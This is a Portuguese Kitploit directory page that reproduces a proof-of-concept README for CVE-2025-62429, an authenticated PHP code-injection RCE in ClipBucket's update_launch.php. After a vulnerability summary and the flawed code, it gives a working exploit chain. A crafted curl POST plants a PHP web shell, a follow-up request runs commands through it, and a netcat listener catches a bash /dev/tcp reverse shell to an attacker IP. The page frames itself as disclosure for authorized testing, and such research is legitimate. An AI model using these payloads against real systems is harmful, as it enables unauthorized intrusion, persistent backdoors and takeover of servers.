Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-62429 — CVE-2025-62429 | clipbucket RCE | Kitploit
Ferramentas/GitHubGitHub/drkim-dev/cve-2025-62429
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubdrkim-dev/cve-2025-62429

CVE-2025-62429

CVE-2025-62429 | clipbucket RCE

Ver Repositório
11há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-62429 PoC - clipbucket RCE

Prova de Conceito para RCE via Injeção de Código PHP em update_launch.php

Divulgação: Originalmente reportado por mim via GHSA-3h9c-7j8r-xc3v

⚠️ Uso autorizado apenas para testes de penetração/pesquisa.

Informações da Vulnerabilidade

CampoValor
CVE IDCVE-2025-62429
Severidade🔴 Alta
Pontuação CVSS7.2
Vetor CVSS[CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]
CWECWE-78: Injeção de Comando do SO, CWE-94: Injeção de Código
Produto AfetadoClibBucket <= 5.5.3 - #79
Versão Corrigida5.5.3 - #80
AvisoGHSA-3h9c-7j8r-xc3v

CVE-2025-62429: Execução Remota de Código (RCE) Autenticada via Injeção de Código PHP em update_launch.php

Resumo

Existe uma vulnerabilidade de Execução Remota de Código (RCE) Autenticada no ClipBucket v5.5.3-61. A vulnerabilidade é classificada como CWE-94: Controle Inadequado da Geração de Código ('Injeção de Código'). A aplicação não sanitiza corretamente a entrada controlada pelo usuário usada para gerar código PHP executável em update_launch.php. Um administrador autenticado pode explorar isso para obter execução completa de comandos no servidor subjacente, escalando privilégios de um administrador web para o usuário do sistema (por exemplo, containeruser).


Detalhes

A vulnerabilidade está localizada em upload/admin_area/actions/update_launch.php. Este script facilita atualizações do sistema gerando dinamicamente um script PHP temporário em segundo plano.

Trecho de Código Vulnerável: upload/admin_area/actions/update_launch.php (Linhas 40-86)

root@kitploit:~
// User input from $_POST['type'] is directly concatenated into a PHP string.
$data = '<?php
if (php_sapi_name() != \'cli\') { die; }
...
$type = \'' . $_POST['type'] . '\'; // <--- VULNERABILITY: Direct concatenation
...
?>';
fwrite($tmp_file, $data);
fclose($tmp_file);

// The generated file is executed via shell_exec using the PHP CLI.
$cmd = System::get_binaries('php') . ' -q ' . DirPath::get('temp') . 'update_core_tmp.php';
shell_exec($cmd);
imagem imagem

Mecanismo de Exploração: Como o parâmetro type é concatenado na string $data sem escape ou sanitização, um atacante pode usar uma aspa simples (') para sair do contexto literal da string. Em seguida, pode injetar funções PHP arbitrárias (como system() ou file_put_contents()) e comentar o restante do código original usando //. Isso resulta na execução de código fornecido pelo atacante com os privilégios do processo PHP-CLI.


Pré-requisitos

  • Nível de Acesso: Privilégios de administrador.
  • Autenticação: Um cookie de sessão PHPSESSID válido. imagem

PoC (Prova de Conceito)

Estágio 1: Verificação e Implantação de Web Shell (Persistência)

Primeiro demonstramos a vulnerabilidade implantando um web shell persistente na raiz do documento.

  1. Envie uma requisição POST manipulada para o endpoint vulnerável:
root@kitploit:~
curl -X POST "http://[TARGET_IP]/admin_area/actions/update_launch.php" \
-H "Cookie: PHPSESSID=[ADMIN_SESSION_ID]" \
-d "type=core'; file_put_contents(dirname(__DIR__, 2).'/vuln.php', '<?php system(\$_GET[\"cmd\"]); ?>'); //"
imagem
  1. Confirme a execução recuperando a identidade do sistema:
root@kitploit:~
curl -s "http://[TARGET_IP]/vuln.php?cmd=id"
# Expected Response: uid=1000(containeruser) gid=1000(containeruser) ...
imagem

Estágio 2: Reverse Shell (Controle Total do Sistema)

Após confirmar o RCE, um shell interativo é estabelecido para pós-exploração.

  1. Inicie um listener Netcat na máquina atacante:
root@kitploit:~
nc -lvnp 4444
imagem
  1. Dispare o reverse shell através do web shell implantado:
root@kitploit:~
curl -G "http://[TARGET_IP]/vuln.php" \
--data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/[KALI_IP]/4444 0>&1'"
imagem imagem

A máquina atacante recebe uma conexão, concedendo acesso interativo completo ao shell como o usuário containeruser.


Impacto

A exploração bem-sucedida permite que um atacante execute comandos arbitrários do sistema. Isso resulta em:

  • Acesso Total aos Dados: Capacidade de ler arquivos de configuração sensíveis (ex: config.inc.php) e o banco de dados inteiro.
  • Violação da Integridade do Sistema: Modificação ou exclusão de qualquer arquivo acessível ao processo do servidor web.
  • Movimentação Lateral: O host comprometido pode servir como ponto de pivô para ataques adicionais na infraestrutura interna.

Aviso Relacionado / Referência CVE

Este problema está relacionado à vulnerabilidade divulgada anteriormente:

  • GHSA-3x4g-x3gv-rjmq
  • CVE-2025-62429

Após análise adicional, constatou-se que a vulnerabilidade persiste no ClipBucket v5.5.3 devido a uma correção incompleta.
Enquanto o aviso original abordava parte do problema, o vetor de injeção de código PHP através do parâmetro type em update_launch.php permaneceu explorável.

Este aviso fornece detalhes técnicos adicionais, verificação na versão mais recente e um cenário completo de exploração ponta a ponta.

Baixar ferramenta